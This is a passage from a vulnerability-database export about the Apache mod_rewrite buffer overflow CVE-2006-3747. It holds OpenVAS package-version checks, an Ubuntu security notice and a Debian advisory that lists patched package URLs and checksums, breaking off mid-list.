revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_accel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_accel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_accel+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_accel+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_deflate\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && 
revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_deflate version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.28\")>=0 && revcomp(a:bver, b:\"1.3.36+2.8.27_1\")<0) {\n txt += 'Package apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update to apache\nannounced via advisory DSA 1131-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:57201", "href": "http://plugins.openvas.org/nasl.php?oid=57201", "type": "openvas", "title": "Debian Security Advisory DSA 1131-1 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1131_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1131-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in version 1.3.33-6sarge2.\n\nFor the unstable distribution (sid) this problems will be fixed shortly.\n\nWe recommend that you upgrade your apache package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201131-1\";\ntag_summary = \"The remote host is missing an update to apache\nannounced via advisory DSA 1131-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. 
In some situations a\nremote attacker could exploit this to execute arbitrary code.\";\n\n\nif(description)\n{\n script_id(57201);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1131-1 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache-dev\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-doc\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-utils\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-common\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-dbg\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-perl\", 
ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-ssl\", ver:\"1.3.33-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-perl\", ver:\"1.29.0.3-6sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747", "CVE-2005-3352"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65142", "href": "http://plugins.openvas.org/nasl.php?oid=65142", "type": "openvas", "title": "SLES9: Security update for Apache2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021257.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65142);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\", \"CVE-2005-3352\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.49~27.51\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747", "CVE-2005-3352"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065142", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065142", "type": "openvas", "title": "SLES9: Security update for Apache2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021257.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache2-worker\n apache2\n apache2-prefork\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021257 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65142\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3747\", \"CVE-2005-3352\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.49~27.51\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:29:46", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite \nmodule's ldap scheme handling. On systems which activate \n\"RewriteEngine on\", a remote attacker could exploit certain rewrite \nrules to crash Apache, or potentially even execute arbitrary code \n(this has not been verified).\n\n\"RewriteEngine on\" is disabled by default. 
Systems which have this \ndirective disabled are not affected at all.", "edition": 6, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "USN-328-1", "href": "https://ubuntu.com/security/notices/USN-328-1", "title": "Apache vulnerability", "type": "ubuntu", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:27:17", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1132-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nAug 1st, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-3747\nCERT advisory : VU#395412\nDebian Bug : 380182\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. 
In some situations a\nremote attacker could exploit this to execute arbitrary code.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.0.54-5sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed shortly.\n\nWe recommend that you upgrade your apache2 package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1.dsc\n Size/MD5 checksum: 1153 4b2aeab1c5578a6879c1d036487c75a2\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1.diff.gz\n Size/MD5 checksum: 110080 57c824fbbbae3fa68d504797fa8e6341\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54.orig.tar.gz\n Size/MD5 checksum: 7493636 37d0d0a3e25ad93d37f0483021e70409\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2-doc_2.0.54-5sarge1_all.deb\n Size/MD5 checksum: 3891046 f860e8207364bbbf05cfd81fa281508e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-threadpool_2.0.54-5sarge1_all.deb\n Size/MD5 checksum: 33564 7d974c7e0f38c6e31017e712f15214fd\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 33488 f36f397f92e8946d342d8b939a8e1f41\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 865320 82e919111eccc60ed021aa196cc3cb00\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 246374 e6d9e455161bad25b178992b109c9375\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 241488 80524503bc76924132c26df38c61e5ad\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 245676 91eab40f8da34595f1a96c1b3c2254a3\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 167694 81b924d7aca297e86e600a3439d31d4a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 168422 fa3bf3865b48d5a8324a6e6135ffaab1\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 97552 67c989219009488916ba16f399fa33fb\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 155792 ff3355874d8b7fa7c6ad1c55f8eabb8c\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_alpha.deb\n Size/MD5 checksum: 315260 ed3c2bc91b3be333c535aae01959f5f0\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 33482 431da06ae2973e4ab7e6195652b4f8b6\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 826686 3e2d13f95a82053ec6afa782ae62ffec\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 221350 7f3384834425befc9437ff16795fe827\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 216820 76034c08d148bf01b7eb72f5156fe2bc\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 220588 382bd5f3a47262c68c72566ae45aa005\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 167698 fb700ccba617ede30505a1a75f1528c1\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 168438 d0dd58b34bf5bb543f2bf9971bc30f17\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 92732 db6b4a3d3d2fa90a193c5d799b27161c\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 137334 5318191c95c001866e475a9f8218a0d0\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_amd64.deb\n Size/MD5 checksum: 278836 fd2955649002a6d3c4b6de7c9f18c794\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 33490 1584e54d81dbfc1d45f6208ad268903d\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 793694 233ea0fad9d5531cdc20182474c583fc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 202316 8916fa2da9d7740f4b1ac22f498bd47d\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 197954 bbaefcea762f1600f0ba330d79d63b5e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 201344 c494ebb8a6662ebb777f9f615ea50579\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 167706 ac66b709dbf32ea62406dd9131727f4b\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 168440 bbb3c010fb98d9bc96da846cb57c1c80\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 92652 92ac8c180bd95c8fcb4fbcc173fd93f9\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 122384 4802054d8d5b2f25d5b4ed32f2bbcad2\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_arm.deb\n Size/MD5 checksum: 267920 02f1b191a308bdb9c4c9955a9a5170ea\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 33486 7234f5717dbcbb800e90949d63cc1ddc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 812294 87b7c53659af00252c76484d030b76dd\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 206644 f27a272c1e7c8a64fe3099e81879afe5\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 202834 e9c259b62700c20aa0a123aac7ef8468\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 206402 0b12002711a684dee34a6f158c08b008\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 168868 9905d2bd31aaf49cb4c522a7130fc53e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 169670 6bdf51222903fb1af0a1950e8f02e7e6\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 90916 15031d3164bf986a7d321d67f6f872f7\n 
http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 130372 f3aa36ce42aca7c552630338b70c4147\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_i386.deb\n Size/MD5 checksum: 260374 ffbe645e8c6762205148f7aa8656a3c7\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 33486 0cd1947abffb3793f6c0dc7690632573\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 973648 7522385d947774e00a2b0f9c8586cc11\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 289276 bace1a0298d9336892bedbdc708f35ec\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 281296 6495947c25e20f5459d44980378420f7\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 287876 d63b895f7d31859642932ef11521120b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 167676 ae253a0de588b5f3c75cd0139c23b94e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 168418 b9a670874ff49ad8016ce34f65db75ca\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 106404 02c8d485338f0f86e61769bedfd1195e\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 177836 5f1d653818331006ad992b9f29fec1c3\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_ia64.deb\n Size/MD5 checksum: 328478 565500d14485fdfc229d31094477d79d\n\n HP Precision architecture:\n\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 33488 c097912333905a2634218aca2f925af4\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 880192 bbf9181e42bf15946ea823bd4c60187a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 228778 3f678491b1a4cdf7087ba3f7b579d2e4\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 222784 53c3247eb337389bf5610ffdc12101aa\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 227604 a55def8a3be473430a5add57f74a9e3e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 167694 d986e8cc3ad0512e9e37d9d22209df6a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 168436 77ed5eaaad9378052171f6317ba7f3b0\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 98822 048922c9ca8664f57b80c2f45f401d7f\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 144996 20192edf00b0449ef13a9c104750c1fb\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_hppa.deb\n Size/MD5 checksum: 285012 86cf97e94f01f18e3c2263d94eb3f4f2\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 33496 7ed8701d7c988c636a45eb66ea558b11\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 783354 bbd0d75542a89db2b9af3fda0801251b\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 188908 1798d4afe93c070b947be8d80097a3a5\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 185514 1c0bf8a9a6f173753080c77af11fde0b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 188314 c188c7e4ab5c0bd9af90e3cce04cb119\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 167770 7c804084f4c5104ea0e1759664bfc950\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 168494 46bb18ed1ad60faee0356fcf927a8d7e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 88058 